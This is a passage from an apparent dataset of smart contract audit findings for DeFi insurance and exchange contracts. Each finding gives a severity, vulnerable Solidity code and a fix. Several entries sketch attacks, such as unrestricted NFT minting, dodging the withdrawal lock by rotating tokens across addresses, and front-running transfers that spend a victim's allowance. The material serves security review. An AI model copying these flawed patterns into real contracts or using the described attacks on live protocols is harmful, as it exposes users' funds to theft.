uint \\_destAmount, bytes memory \\_additionalData) public override view returns (uint rate) {\\n uint256 srcRate = getSellRate(\\_destAddr, \\_srcAddr, \\_destAmount, \\_additionalData);\\n uint256 srcAmount = wmul(srcRate, \\_destAmount);\\n\\n rate = getSellRate(\\_srcAddr, \\_destAddr, srcAmount, \\_additionalData);\\n\\n // increase rate by 3% too account for inaccuracy between sell/buy conversion\\n rate = rate + (rate / 30);\\n }\\n```\\n","Refactoring the code to separate getting rate functionality with `getSellRate` and `getBuyRate`. Explicitly document any assumptions in the code ( slippage, etc)",,"```\\n function getSellRate(address \\_srcAddr, address \\_destAddr, uint \\_srcAmount, bytes memory) public override view returns (uint rate) {\\n (rate, ) = KyberNetworkProxyInterface(KYBER\\_INTERFACE)\\n .getExpectedRate(IERC20(\\_srcAddr), IERC20(\\_destAddr), \\_srcAmount);\\n\\n // multiply with decimal difference in src token\\n rate = rate \\* (10\\*\\*(18 - getDecimals(\\_srcAddr)));\\n // divide with decimal difference in dest token\\n rate = rate / (10\\*\\*(18 - getDecimals(\\_destAddr)));\\n }\\n\\n /// @notice Return a rate for which we can buy an amount of tokens\\n /// @param \\_srcAddr From token\\n /// @param \\_destAddr To token\\n /// @param \\_destAmount To amount\\n /// @return rate Rate\\n function getBuyRate(address \\_srcAddr, address \\_destAddr, uint \\_destAmount, bytes memory \\_additionalData) public override view returns (uint rate) {\\n uint256 srcRate = getSellRate(\\_destAddr, \\_srcAddr, \\_destAmount, \\_additionalData);\\n uint256 srcAmount = wmul(srcRate, \\_destAmount);\\n\\n rate = getSellRate(\\_srcAddr, \\_destAddr, srcAmount, \\_additionalData);\\n\\n // increase rate by 3% too account for inaccuracy between sell/buy conversion\\n rate = rate + (rate / 30);\\n }\\n```\\n" +Return values not used for DFSExchangeCore.onChainSwap,low,"Return values from `DFSExchangeCore.onChainSwap` are not used.\\n```\\nfunction \\_sell(ExchangeData memory exData) internal returns (address, uint256) {\\n uint256 amountWithoutFee = exData.srcAmount;\\n address wrapper = exData.offchainData.wrapper;\\n bool offChainSwapSuccess;\\n\\n uint256 destBalanceBefore = exData.destAddr.getBalance(address(this));\\n\\n // Takes DFS exchange fee\\n exData.srcAmount -= getFee(\\n exData.srcAmount,\\n exData.user,\\n exData.srcAddr,\\n exData.dfsFeeDivider\\n );\\n\\n // Try 0x first and then fallback on specific wrapper\\n if (exData.offchainData.price > 0) {\\n (offChainSwapSuccess, ) = offChainSwap(exData, ExchangeActionType.SELL);\\n }\\n\\n // fallback to desired wrapper if 0x failed\\n if (!offChainSwapSuccess) {\\n onChainSwap(exData, ExchangeActionType.SELL);\\n wrapper = exData.wrapper;\\n }\\n\\n uint256 destBalanceAfter = exData.destAddr.getBalance(address(this));\\n uint256 amountBought = sub(destBalanceAfter, destBalanceBefore);\\n\\n // check slippage\\n require(amountBought >= wmul(exData.minPrice, exData.srcAmount), ERR\\_SLIPPAGE\\_HIT);\\n\\n // revert back exData changes to keep it consistent\\n exData.srcAmount = amountWithoutFee;\\n\\n return (wrapper, amountBought);\\n}\\n```\\n\\n```\\nfunction \\_buy(ExchangeData memory exData) internal returns (address, uint256) {\\n require(exData.destAmount != 0, ERR\\_DEST\\_AMOUNT\\_MISSING);\\n\\n uint256 amountWithoutFee = exData.srcAmount;\\n address wrapper = exData.offchainData.wrapper;\\n bool offChainSwapSuccess;\\n\\n uint256 destBalanceBefore = exData.destAddr.getBalance(address(this));\\n\\n // Takes DFS exchange fee\\n exData.srcAmount -= getFee(\\n exData.srcAmount,\\n exData.user,\\n exData.srcAddr,\\n exData.dfsFeeDivider\\n );\\n\\n // Try 0x first and then fallback on specific wrapper\\n if (exData.offchainData.price > 0) {\\n (offChainSwapSuccess, ) = offChainSwap(exData, ExchangeActionType.BUY);\\n }\\n\\n // fallback to desired wrapper if 0x failed\\n if (!offChainSwapSuccess) {\\n onChainSwap(exData, ExchangeActionType.BUY);\\n wrapper = exData.wrapper;\\n }\\n\\n uint256 destBalanceAfter = exData.destAddr.getBalance(address(this));\\n uint256 amountBought = sub(destBalanceAfter, destBalanceBefore);\\n\\n // check slippage\\n require(amountBought >= exData.destAmount, ERR\\_SLIPPAGE\\_HIT);\\n\\n // revert back exData changes to keep it consistent\\n exData.srcAmount = amountWithoutFee;\\n\\n return (wrapper, amountBought);\\n}\\n```\\n",The return value can be used for verification of the swap or used in the event data.,,"```\\nfunction \\_sell(ExchangeData memory exData) internal returns (address, uint256) {\\n uint256 amountWithoutFee = exData.srcAmount;\\n address wrapper = exData.offchainData.wrapper;\\n bool offChainSwapSuccess;\\n\\n uint256 destBalanceBefore = exData.destAddr.getBalance(address(this));\\n\\n // Takes DFS exchange fee\\n exData.srcAmount -= getFee(\\n exData.srcAmount,\\n exData.user,\\n exData.srcAddr,\\n exData.dfsFeeDivider\\n );\\n\\n // Try 0x first and then fallback on specific wrapper\\n if (exData.offchainData.price > 0) {\\n (offChainSwapSuccess, ) = offChainSwap(exData, ExchangeActionType.SELL);\\n }\\n\\n // fallback to desired wrapper if 0x failed\\n if (!offChainSwapSuccess) {\\n onChainSwap(exData, ExchangeActionType.SELL);\\n wrapper = exData.wrapper;\\n }\\n\\n uint256 destBalanceAfter = exData.destAddr.getBalance(address(this));\\n uint256 amountBought = sub(destBalanceAfter, destBalanceBefore);\\n\\n // check slippage\\n require(amountBought >= wmul(exData.minPrice, exData.srcAmount), ERR\\_SLIPPAGE\\_HIT);\\n\\n // revert back exData changes to keep it consistent\\n exData.srcAmount = amountWithoutFee;\\n\\n return (wrapper, amountBought);\\n}\\n```\\n" +Return value is not used for TokenUtils.withdrawTokens,low,"The return value of `TokenUtils.withdrawTokens` which represents the actual amount of tokens that were transferred is never used throughout the repository. This might cause discrepancy in the case where the original value of `_amount` was `type(uint256).max`.\\n```\\nfunction \\_borrow(\\n address \\_market,\\n address \\_tokenAddr,\\n uint256 \\_amount,\\n uint256 \\_rateMode,\\n address \\_to,\\n address \\_onBehalf\\n) internal returns (uint256) {\\n ILendingPoolV2 lendingPool = getLendingPool(\\_market);\\n\\n // defaults to onBehalf of proxy\\n if (\\_onBehalf == address(0)) {\\n \\_onBehalf = address(this);\\n }\\n\\n lendingPool.borrow(\\_tokenAddr, \\_amount, \\_rateMode, AAVE\\_REFERRAL\\_CODE, \\_onBehalf);\\n\\n \\_tokenAddr.withdrawTokens(\\_to, \\_amount);\\n\\n logger.Log(\\n address(this),\\n msg.sender,\\n ""AaveBorrow"",\\n abi.encode(\\_market, \\_tokenAddr, \\_amount, \\_rateMode, \\_to, \\_onBehalf)\\n );\\n\\n return \\_amount;\\n}\\n```\\n\\n```\\nfunction withdrawTokens(\\n address \\_token,\\n address \\_to,\\n uint256 \\_amount\\n) internal returns (uint256) {\\n if (\\_amount == type(uint256).max) {\\n \\_amount = getBalance(\\_token, address(this));\\n }\\n```\\n",The return value can be used to validate the withdrawal or used in the event emitted.,,"```\\nfunction \\_borrow(\\n address \\_market,\\n address \\_tokenAddr,\\n uint256 \\_amount,\\n uint256 \\_rateMode,\\n address \\_to,\\n address \\_onBehalf\\n) internal returns (uint256) {\\n ILendingPoolV2 lendingPool = getLendingPool(\\_market);\\n\\n // defaults to onBehalf of proxy\\n if (\\_onBehalf == address(0)) {\\n \\_onBehalf = address(this);\\n }\\n\\n lendingPool.borrow(\\_tokenAddr, \\_amount, \\_rateMode, AAVE\\_REFERRAL\\_CODE, \\_onBehalf);\\n\\n \\_tokenAddr.withdrawTokens(\\_to, \\_amount);\\n\\n logger.Log(\\n address(this),\\n msg.sender,\\n ""AaveBorrow"",\\n abi.encode(\\_market, \\_tokenAddr, \\_amount, \\_rateMode, \\_to, \\_onBehalf)\\n );\\n\\n return \\_amount;\\n}\\n```\\n" +Anyone is able to mint NFTs by calling mintNFTsForLM,high,"The contract `LiquidityMiningNFT` has the method `mintNFTsForLM`.\\n```\\nfunction mintNFTsForLM(address \\_liquidiyMiningAddr) external {\\n uint256[] memory \\_ids = new uint256[](NFT\\_TYPES\\_COUNT);\\n uint256[] memory \\_amounts = new uint256[](NFT\\_TYPES\\_COUNT);\\n\\n \\_ids[0] = 1;\\n \\_amounts[0] = 5;\\n\\n \\_ids[1] = 2;\\n \\_amounts[1] = 1 \\* LEADERBOARD\\_SIZE;\\n\\n \\_ids[2] = 3;\\n \\_amounts[2] = 3 \\* LEADERBOARD\\_SIZE;\\n\\n \\_ids[3] = 4;\\n \\_amounts[3] = 6 \\* LEADERBOARD\\_SIZE;\\n\\n \\_mintBatch(\\_liquidiyMiningAddr, \\_ids, \\_amounts, """");\\n}\\n```\\n\\nHowever, this contract does not have any kind of special permissions to limit who is able to mint tokens.\\nAn attacker could call `LiquidityMiningNFT.mintNFTsForLM(0xhackerAddress)` to mint tokens for their address and sell them on the marketplace. They are also allowed to mint as many tokens as they want by calling the method multiple times.",Add some permissions to limit only some actors to mint tokens.,,"```\\nfunction mintNFTsForLM(address \\_liquidiyMiningAddr) external {\\n uint256[] memory \\_ids = new uint256[](NFT\\_TYPES\\_COUNT);\\n uint256[] memory \\_amounts = new uint256[](NFT\\_TYPES\\_COUNT);\\n\\n \\_ids[0] = 1;\\n \\_amounts[0] = 5;\\n\\n \\_ids[1] = 2;\\n \\_amounts[1] = 1 \\* LEADERBOARD\\_SIZE;\\n\\n \\_ids[2] = 3;\\n \\_amounts[2] = 3 \\* LEADERBOARD\\_SIZE;\\n\\n \\_ids[3] = 4;\\n \\_amounts[3] = 6 \\* LEADERBOARD\\_SIZE;\\n\\n \\_mintBatch(\\_liquidiyMiningAddr, \\_ids, \\_amounts, """");\\n}\\n```\\n" +A liquidity provider can withdraw all his funds anytime,high,"Since some users provide liquidity to sell the insurance policies, it is important that these providers cannot withdraw their funds when the security breach happens and the policyholders are submitting claims. The liquidity providers can only request their funds first and withdraw them later (in a week).\\n```\\nfunction requestWithdrawal(uint256 \\_tokensToWithdraw) external override {\\n WithdrawalStatus \\_status = getWithdrawalStatus(msg.sender);\\n\\n require(\\_status == WithdrawalStatus.NONE || \\_status == WithdrawalStatus.EXPIRED,\\n ""PB: Can't request withdrawal"");\\n\\n uint256 \\_daiTokensToWithdraw = \\_tokensToWithdraw.mul(getDAIToDAIxRatio()).div(PERCENTAGE\\_100);\\n uint256 \\_availableDaiBalance = balanceOf(msg.sender).mul(getDAIToDAIxRatio()).div(PERCENTAGE\\_100);\\n\\n if (block.timestamp < liquidityMining.getEndLMTime().add(neededTimeAfterLM)) {\\n \\_availableDaiBalance = \\_availableDaiBalance.sub(liquidityFromLM[msg.sender]);\\n }\\n\\n require(totalLiquidity >= totalCoverTokens.add(\\_daiTokensToWithdraw),\\n ""PB: Not enough liquidity"");\\n\\n require(\\_availableDaiBalance >= \\_daiTokensToWithdraw, ""PB: Wrong announced amount"");\\n\\n WithdrawalInfo memory \\_newWithdrawalInfo;\\n \\_newWithdrawalInfo.amount = \\_tokensToWithdraw;\\n \\_newWithdrawalInfo.readyToWithdrawDate = block.timestamp.add(withdrawalPeriod);\\n\\n withdrawalsInfo[msg.sender] = \\_newWithdrawalInfo;\\n emit RequestWithdraw(msg.sender, \\_tokensToWithdraw, \\_newWithdrawalInfo.readyToWithdrawDate);\\n}\\n```\\n\\n```\\nfunction withdrawLiquidity() external override {\\n require(getWithdrawalStatus(msg.sender) == WithdrawalStatus.READY,\\n ""PB: Withdrawal is not ready"");\\n\\n uint256 \\_tokensToWithdraw = withdrawalsInfo[msg.sender].amount;\\n uint256 \\_daiTokensToWithdraw = \\_tokensToWithdraw.mul(getDAIToDAIxRatio()).div(PERCENTAGE\\_100);\\n\\n if (withdrawalQueue.length != 0 || totalLiquidity.sub(\\_daiTokensToWithdraw) < totalCoverTokens) {\\n withdrawalQueue.push(msg.sender);\\n } else {\\n \\_withdrawLiquidity(msg.sender, \\_tokensToWithdraw);\\n }\\n}\\n```\\n\\nThere is a restriction in `requestWithdrawal` that requires the liquidity provider to have enough funds at the moment of request:\\n```\\nrequire(totalLiquidity >= totalCoverTokens.add(\\_daiTokensToWithdraw),\\n ""PB: Not enough liquidity"");\\n\\nrequire(\\_availableDaiBalance >= \\_daiTokensToWithdraw, ""PB: Wrong announced amount"");\\n```\\n\\nBut after the request is created, these funds can then be transferred to another address. When the request is created, the provider should wait for 7 days, and then there will be 2 days to withdraw the requested amount:\\n```\\nwithdrawalPeriod = 1 weeks;\\nwithdrawalExpirePeriod = 2 days;\\n```\\n\\nThe attacker would have 4 addresses that will send the pool tokens to each other and request withdrawal of the full amount one by one every 2 days. So at least one of the addresses can withdraw all of the funds at any point in time. If the liquidity provider needs to withdraw funds immediately, he should transfer all funds to that address and execute the withdrawal.","Resolution\\nThe funds are now locked when the withdrawal is requested, so funds cannot be transferred after the request, and this bug cannot be exploited anymore.\\nOne of the solutions would be to block the DAIx tokens from being transferred after the withdrawal request.",,"```\\nfunction requestWithdrawal(uint256 \\_tokensToWithdraw) external override {\\n WithdrawalStatus \\_status = getWithdrawalStatus(msg.sender);\\n\\n require(\\_status == WithdrawalStatus.NONE || \\_status == WithdrawalStatus.EXPIRED,\\n ""PB: Can't request withdrawal"");\\n\\n uint256 \\_daiTokensToWithdraw = \\_tokensToWithdraw.mul(getDAIToDAIxRatio()).div(PERCENTAGE\\_100);\\n uint256 \\_availableDaiBalance = balanceOf(msg.sender).mul(getDAIToDAIxRatio()).div(PERCENTAGE\\_100);\\n\\n if (block.timestamp < liquidityMining.getEndLMTime().add(neededTimeAfterLM)) {\\n \\_availableDaiBalance = \\_availableDaiBalance.sub(liquidityFromLM[msg.sender]);\\n }\\n\\n require(totalLiquidity >= totalCoverTokens.add(\\_daiTokensToWithdraw),\\n ""PB: Not enough liquidity"");\\n\\n require(\\_availableDaiBalance >= \\_daiTokensToWithdraw, ""PB: Wrong announced amount"");\\n\\n WithdrawalInfo memory \\_newWithdrawalInfo;\\n \\_newWithdrawalInfo.amount = \\_tokensToWithdraw;\\n \\_newWithdrawalInfo.readyToWithdrawDate = block.timestamp.add(withdrawalPeriod);\\n\\n withdrawalsInfo[msg.sender] = \\_newWithdrawalInfo;\\n emit RequestWithdraw(msg.sender, \\_tokensToWithdraw, \\_newWithdrawalInfo.readyToWithdrawDate);\\n}\\n```\\n" +The buyPolicyFor/addLiquidityFor should transfer funds from msg.sender,high,"When calling the buyPolicyFor/addLiquidityFor functions, are called with the parameter _policyHolderAddr/_liquidityHolderAddr who is going to be the beneficiary in buying policy/adding liquidity:\\n```\\nfunction buyPolicyFor(\\n address \\_policyHolderAddr,\\n uint256 \\_epochsNumber,\\n uint256 \\_coverTokens \\n) external override {\\n \\_buyPolicyFor(\\_policyHolderAddr, \\_epochsNumber, \\_coverTokens);\\n}\\n```\\n\\n```\\nfunction addLiquidityFor(address \\_liquidityHolderAddr, uint256 \\_liquidityAmount) external override {\\n \\_addLiquidityFor(\\_liquidityHolderAddr, \\_liquidityAmount, false);\\n}\\n```\\n\\nDuring the execution, the funds for the policy/liquidity are transferred from the _policyHolderAddr/_liquidityHolderAddr, while it's usually expected that they should be transferred from `msg.sender`. Because of that, anyone can call a function on behalf of a user that gave the allowance to the `PolicyBook`.\\nFor example, a user(victim) wants to add some DAI to the liquidity pool and gives allowance to the `PolicyBook`. After that, the user should call `addLiquidity`, but the attacker can front-run this transaction and buy a policy on behalf of the victim instead.\\nAlso, there is a curious edge case that makes this issue Critical: _policyHolderAddr/_liquidityHolderAddr parameters can be equal to the address of the `PolicyBook` contract. That may lead to multiple different dangerous attack vectors.",Make sure that nobody can transfer funds on behalf of the users if it's not intended.,,"```\\nfunction buyPolicyFor(\\n address \\_policyHolderAddr,\\n uint256 \\_epochsNumber,\\n uint256 \\_coverTokens \\n) external override {\\n \\_buyPolicyFor(\\_policyHolderAddr, \\_epochsNumber, \\_coverTokens);\\n}\\n```\\n" +LiquidityMining can't accept single ERC1155 tokens,high,"The contract `LiquidityMining` is also defined as an `ERC1155Receiver`\\n```\\ncontract LiquidityMining is ILiquidityMining, ERC1155Receiver, Ownable {\\n```\\n\\nThe finalized EIP-1155 standard states that a contract which acts as an EIP-1155 Receiver must implement all the functions in the `ERC1155TokenReceiver` interface to be able to accept transfers.\\nThese are indeed implemented here:\\n```\\nfunction onERC1155Received(\\n```\\n\\n```\\nfunction onERC1155BatchReceived(\\n```\\n\\nThe standard states that they will be called and they MUST return a specific `byte4` value, otherwise the transfer will fail.\\nHowever one of the methods returns an incorrect value. This seems to an error generated by a copy/paste action.\\n```\\nfunction onERC1155Received(\\n address operator,\\n address from,\\n uint256 id,\\n uint256 value,\\n bytes memory data\\n)\\n external\\n pure\\n override\\n returns(bytes4)\\n{\\n return bytes4(keccak256(""onERC1155BatchReceived(address,address,uint256[],uint256[],bytes)""));\\n}\\n```\\n\\nThe value returned is equal to\\n`bytes4(keccak256(""onERC1155BatchReceived(address,address,uint256[],uint256[],bytes)""));`\\nBut it should be\\n`bytes4(keccak256(""onERC1155Received(address,address,uint256,uint256,bytes)""))`.\\nOn top of this, the contract MUST implement the ERC-165 standard to correctly respond to `supportsInterface`.","Change the return value of `onERC1155Received` to be equal to `0xf23a6e61` which represents `bytes4(keccak256(""onERC1155Received(address,address,uint256,uint256,bytes)""))`.\\nAlso, make sure to implement `supportsInterface` to signify support of `ERC1155TokenReceiver` to accept transfers.\\nAdd tests to check the functionality is correct and make sure these kinds of bugs do not exist in the future.\\nMake sure to read the EIP-1155 and EIP-165 standards in detail and implement them correctly.",,"```\\ncontract LiquidityMining is ILiquidityMining, ERC1155Receiver, Ownable {\\n```\\n" +DAI is assumed to have the same price as DAIx in the staking contract,high,"When a liquidity provider stakes tokens to the `BMIDAIStaking` contract, the equal amount of DAI and DAIx are transferred from the pool contract.\\n```\\nfunction \\_stakeDAIx(address \\_user, uint256 \\_amount, address \\_policyBookAddr) internal {\\n require (\\_amount > 0, ""BMIDAIStaking: Can't stake zero tokens"");\\n\\n PolicyBook \\_policyBook = PolicyBook(\\_policyBookAddr);\\n // transfer DAI from PolicyBook to yield generator\\n daiToken.transferFrom(\\_policyBookAddr, address(defiYieldGenerator), \\_amount); \\n\\n // transfer bmiDAIx from user to staking\\n \\_policyBook.transferFrom(\\_user, address(this), \\_amount); \\n\\n \\_mintNFT(\\_user, \\_amount, \\_policyBook);\\n}\\n```\\n",Only the corresponding amount of DAI should be transferred to the pool.,,"```\\nfunction \\_stakeDAIx(address \\_user, uint256 \\_amount, address \\_policyBookAddr) internal {\\n require (\\_amount > 0, ""BMIDAIStaking: Can't stake zero tokens"");\\n\\n PolicyBook \\_policyBook = PolicyBook(\\_policyBookAddr);\\n // transfer DAI from PolicyBook to yield generator\\n daiToken.transferFrom(\\_policyBookAddr, address(defiYieldGenerator), \\_amount); \\n\\n // transfer bmiDAIx from user to staking\\n \\_policyBook.transferFrom(\\_user, address(this), \\_amount); \\n\\n \\_mintNFT(\\_user, \\_amount, \\_policyBook);\\n}\\n```\\n" +_updateWithdrawalQueue can run out of gas,high,"When there's not enough collateral to withdraw liquidity from a policy book, the withdrawal request is added to a queue. The queue is supposed to be processed and cleared once there are enough funds for that. The only way to do so is the `_updateWithdrawalQueue` function that is caller when new liquidity is added:\\n```\\nfunction \\_updateWithdrawalQueue() internal {\\n uint256 \\_availableLiquidity = totalLiquidity.sub(totalCoverTokens);\\n uint256 \\_countToRemoveFromQueue;\\n\\n for (uint256 i = 0; i < withdrawalQueue.length; i++) { \\n uint256 \\_tokensToWithdraw = withdrawalsInfo[withdrawalQueue[i]].amount;\\n uint256 \\_amountInDai = \\_tokensToWithdraw.mul(getDAIToDAIxRatio()).div(PERCENTAGE\\_100);\\n\\n if (balanceOf(withdrawalQueue[i]) < \\_tokensToWithdraw) {\\n \\_countToRemoveFromQueue++;\\n continue;\\n }\\n\\n if (\\_availableLiquidity >= \\_amountInDai) {\\n \\_withdrawLiquidity(withdrawalQueue[i], \\_tokensToWithdraw);\\n \\_availableLiquidity = \\_availableLiquidity.sub(\\_amountInDai);\\n \\_countToRemoveFromQueue++;\\n } else {\\n break;\\n }\\n }\\n\\n \\_removeFromQueue(\\_countToRemoveFromQueue);\\n}\\n```\\n\\nThe problem is that this function can only process all queue until the pool run out of available funds or the whole queue is going to be processed. If the queue is big enough, this process can be stuck.",Pass the parameter to the `_updateWithdrawalQueue` that defines how many requests to process in the queue per one call.,,"```\\nfunction \\_updateWithdrawalQueue() internal {\\n uint256 \\_availableLiquidity = totalLiquidity.sub(totalCoverTokens);\\n uint256 \\_countToRemoveFromQueue;\\n\\n for (uint256 i = 0; i < withdrawalQueue.length; i++) { \\n uint256 \\_tokensToWithdraw = withdrawalsInfo[withdrawalQueue[i]].amount;\\n uint256 \\_amountInDai = \\_tokensToWithdraw.mul(getDAIToDAIxRatio()).div(PERCENTAGE\\_100);\\n\\n if (balanceOf(withdrawalQueue[i]) < \\_tokensToWithdraw) {\\n \\_countToRemoveFromQueue++;\\n continue;\\n }\\n\\n if (\\_availableLiquidity >= \\_amountInDai) {\\n \\_withdrawLiquidity(withdrawalQueue[i], \\_tokensToWithdraw);\\n \\_availableLiquidity = \\_availableLiquidity.sub(\\_amountInDai);\\n \\_countToRemoveFromQueue++;\\n } else {\\n break;\\n }\\n }\\n\\n \\_removeFromQueue(\\_countToRemoveFromQueue);\\n}\\n```\\n" +The PolicyBook should make DAI transfers inside the contract,medium,"The `PolicyBook` contract gives full allowance over DAI tokens to the other contracts:\\n```\\nfunction approveAllDaiTokensForStakingAndVotingAndTransferOwnership() internal {\\n daiToken.approve(address(bmiDaiStaking), MAX\\_INT); \\n daiToken.approve(address(claimVoting), MAX\\_INT); \\n\\n transferOwnership(address(bmiDaiStaking));\\n}\\n```\\n\\nThat behavior is dangerous because it's hard to keep track of and control the contract's DAI balance. And it's also hard to track in the code where the balance of the `PolicyBook` can be changed from.","It's better to perform all the transfers inside the `PolicyBook` contract. So if the `bmiDaiStaking` and the `claimVoting` contracts need DAI tokens from the `PolicyBook`, they should call some function of the `PolicyBook` to perform transfers.",,"```\\nfunction approveAllDaiTokensForStakingAndVotingAndTransferOwnership() internal {\\n daiToken.approve(address(bmiDaiStaking), MAX\\_INT); \\n daiToken.approve(address(claimVoting), MAX\\_INT); \\n\\n transferOwnership(address(bmiDaiStaking));\\n}\\n```\\n" +The totalCoverTokens is only updated when the policy is bought,medium,"The `totalCoverTokens` value represents the amount of collateral that needs to be locked in the policy book. It should be changed either by buying a new policy or when an old policy expires. The problem is that when the old policy expires, this value is not updated; it is only updated when someone buys a policy by calling the `_updateEpochsInfo` function:\\n```\\nfunction \\_updateEpochsInfo() internal {\\n uint256 \\_totalEpochTime = block.timestamp.sub(epochStartTime);\\n uint256 \\_countOfPassedEpoch = \\_totalEpochTime.div(epochDuration);\\n\\n uint256 \\_lastEpochUpdate = currentEpochNumber;\\n currentEpochNumber = \\_countOfPassedEpoch.add(1);\\n\\n for (uint256 i = \\_lastEpochUpdate; i < currentEpochNumber; i++) {\\n totalCoverTokens = totalCoverTokens.sub(epochAmounts[i]);\\n delete epochAmounts[i];\\n }\\n}\\n```\\n\\nUsers waiting to withdraw liquidity should wait for someone to buy the policy to update the `totalCoverTokens`.",Resolution\\nThe `updateEpochsInfo` function is now public and can be called by anyone.\\nMake sure it's possible to call the `_updateEpochsInfo` function without buying a new policy.,,```\\nfunction \\_updateEpochsInfo() internal {\\n uint256 \\_totalEpochTime = block.timestamp.sub(epochStartTime);\\n uint256 \\_countOfPassedEpoch = \\_totalEpochTime.div(epochDuration);\\n\\n uint256 \\_lastEpochUpdate = currentEpochNumber;\\n currentEpochNumber = \\_countOfPassedEpoch.add(1);\\n\\n for (uint256 i = \\_lastEpochUpdate; i < currentEpochNumber; i++) {\\n totalCoverTokens = totalCoverTokens.sub(epochAmounts[i]);\\n delete epochAmounts[i];\\n }\\n}\\n```\\n +Unbounded loops in LiquidityMining,medium,There are some methods that have unbounded loops and will fail when enough items exist in the arrays.\\n```\\nfor (uint256 i = 0; i < \\_teamsNumber; i++) {\\n```\\n\\n```\\nfor (uint256 i = 0; i < \\_membersNumber; i++) {\\n```\\n\\n```\\nfor (uint256 i = 0; i < \\_usersNumber; i++) {\\n```\\n\\nThese methods will fail when lots of items will be added to them.,"Consider adding limits (from, to) when requesting the items.",,```\\nfor (uint256 i = 0; i < \\_teamsNumber; i++) {\\n```\\n +The _removeFromQueue is very gas greedy,medium,"The `_removeFromQueue` function is supposed to remove `_countToRemove` elements from the queue:\\n```\\nfunction \\_removeFromQueue(uint256 \\_countToRemove) internal {\\n for (uint256 i = 0; i < \\_countToRemove; i++) {\\n delete withdrawalsInfo[withdrawalQueue[i]];\\n } \\n\\n if (\\_countToRemove == withdrawalQueue.length) {\\n delete withdrawalQueue;\\n } else {\\n uint256 \\_remainingArrLength = withdrawalQueue.length.sub(\\_countToRemove);\\n address[] memory \\_remainingArr = new address[](\\_remainingArrLength);\\n\\n for (uint256 i = 0; i < \\_remainingArrLength; i++) {\\n \\_remainingArr[i] = withdrawalQueue[i.add(\\_countToRemove)];\\n }\\n\\n withdrawalQueue = \\_remainingArr;\\n }\\n}\\n```\\n\\nThis function uses too much gas, which makes it easier to make attacks on the system. Even if only one request is removed and executed, this function rewrites all the requests to the storage.","The data structure should be changed so this function shouldn't rewrite the requests that did not change. For example, it can be a mapping `(unit => address)` with 2 indexes `(start, end)` that are only increasing.",,```\\nfunction \\_removeFromQueue(uint256 \\_countToRemove) internal {\\n for (uint256 i = 0; i < \\_countToRemove; i++) {\\n delete withdrawalsInfo[withdrawalQueue[i]];\\n } \\n\\n if (\\_countToRemove == withdrawalQueue.length) {\\n delete withdrawalQueue;\\n } else {\\n uint256 \\_remainingArrLength = withdrawalQueue.length.sub(\\_countToRemove);\\n address[] memory \\_remainingArr = new address[](\\_remainingArrLength);\\n\\n for (uint256 i = 0; i < \\_remainingArrLength; i++) {\\n \\_remainingArr[i] = withdrawalQueue[i.add(\\_countToRemove)];\\n }\\n\\n withdrawalQueue = \\_remainingArr;\\n }\\n}\\n```\\n +Withdrawal with zero amount is possible,medium,"When creating a withdrawal request, the amount of tokens to withdraw is passed as a parameter:\\n```\\nfunction requestWithdrawal(uint256 \\_tokensToWithdraw) external override {\\n```\\n\\nThe problem is that this parameter can be zero, and the function will be successfully executed. Moreover, this request can then be added to the queue, and the actual withdrawal will also be executed with zero value. Addresses that never added any liquidity could spam the system with these requests.",Do not allow withdrawals of zero tokens.,,```\\nfunction requestWithdrawal(uint256 \\_tokensToWithdraw) external override {\\n```\\n +The withdrawal queue is only updated when the liquidity is added,medium,"Sometimes when the amount of liquidity is not much higher than the number of tokens locked for the collateral, it's impossible to withdraw liquidity. For a user that wants to withdraw liquidity, a withdrawal request is created. If the request can't be executed, it's added to the withdrawal queue, and the user needs to wait until there's enough collateral for withdrawal. There are potentially 2 ways to achieve that: either someone adds more liquidity or some existing policies expire.\\nCurrently, the queue can only be cleared when the internal `_updateWithdrawalQueue` function is called. And it is only called in one place while adding liquidity:\\n```\\nfunction \\_addLiquidityFor(address \\_liquidityHolderAddr, uint256 \\_liquidityAmount, bool \\_isLM) internal {\\n daiToken.transferFrom(\\_liquidityHolderAddr, address(this), \\_liquidityAmount); \\n \\n uint256 \\_amountToMint = \\_liquidityAmount.mul(PERCENTAGE\\_100).div(getDAIToDAIxRatio());\\n totalLiquidity = totalLiquidity.add(\\_liquidityAmount);\\n \\_mintERC20(\\_liquidityHolderAddr, \\_amountToMint);\\n\\n if (\\_isLM) {\\n liquidityFromLM[\\_liquidityHolderAddr] = liquidityFromLM[\\_liquidityHolderAddr].add(\\_liquidityAmount);\\n }\\n\\n \\_updateWithdrawalQueue();\\n\\n emit AddLiquidity(\\_liquidityHolderAddr, \\_liquidityAmount, totalLiquidity);\\n}\\n```\\n","It would be better if the queue could be processed when some policies expire without adding new liquidity. For example, there may be an external function that allows users to process the queue.",,"```\\nfunction \\_addLiquidityFor(address \\_liquidityHolderAddr, uint256 \\_liquidityAmount, bool \\_isLM) internal {\\n daiToken.transferFrom(\\_liquidityHolderAddr, address(this), \\_liquidityAmount); \\n \\n uint256 \\_amountToMint = \\_liquidityAmount.mul(PERCENTAGE\\_100).div(getDAIToDAIxRatio());\\n totalLiquidity = totalLiquidity.add(\\_liquidityAmount);\\n \\_mintERC20(\\_liquidityHolderAddr, \\_amountToMint);\\n\\n if (\\_isLM) {\\n liquidityFromLM[\\_liquidityHolderAddr] = liquidityFromLM[\\_liquidityHolderAddr].add(\\_liquidityAmount);\\n }\\n\\n \\_updateWithdrawalQueue();\\n\\n emit AddLiquidity(\\_liquidityHolderAddr, \\_liquidityAmount, totalLiquidity);\\n}\\n```\\n" +Optimize gas usage when checking max length of arrays,low,"There are a few cases where some arrays have to be limited to a number of items.\\nAnd the max size is enforced by removing the last item if the array reached max size + 1.\\n```\\nif (leaderboard.length == MAX\\_LEADERBOARD\\_SIZE.add(1)) {\\n leaderboard.pop();\\n}\\n```\\n\\n```\\nif (topUsers.length == MAX\\_TOP\\_USERS\\_SIZE.add(1)) {\\n topUsers.pop();\\n}\\n```\\n\\n```\\nif (\\_addresses.length == MAX\\_GROUP\\_LEADERS\\_SIZE.add(1)) {\\n groupsLeaders[\\_referralLink].pop();\\n}\\n```\\n\\nA simpler and cheaper way to check if an item should be removed is to change the condition to\\n```\\nif (limitedSizedArray.length > MAX\\_DEFINED\\_SIZE\\_FOR\\_ARRAY) {\\n limitedSizedArray.pop();\\n}\\n```\\n\\nThis check does not need or do a SafeMath call (which is more expensive), and because of the limited number of items, as well as a practical impossibility to add enough items to overflow the limit, makes it a preferred way to check the maximum limit.","Rewrite the checks and remove SafeMath operations, as well as the addition by 1 and change the check to a “greater than” verification.",,```\\nif (leaderboard.length == MAX\\_LEADERBOARD\\_SIZE.add(1)) {\\n 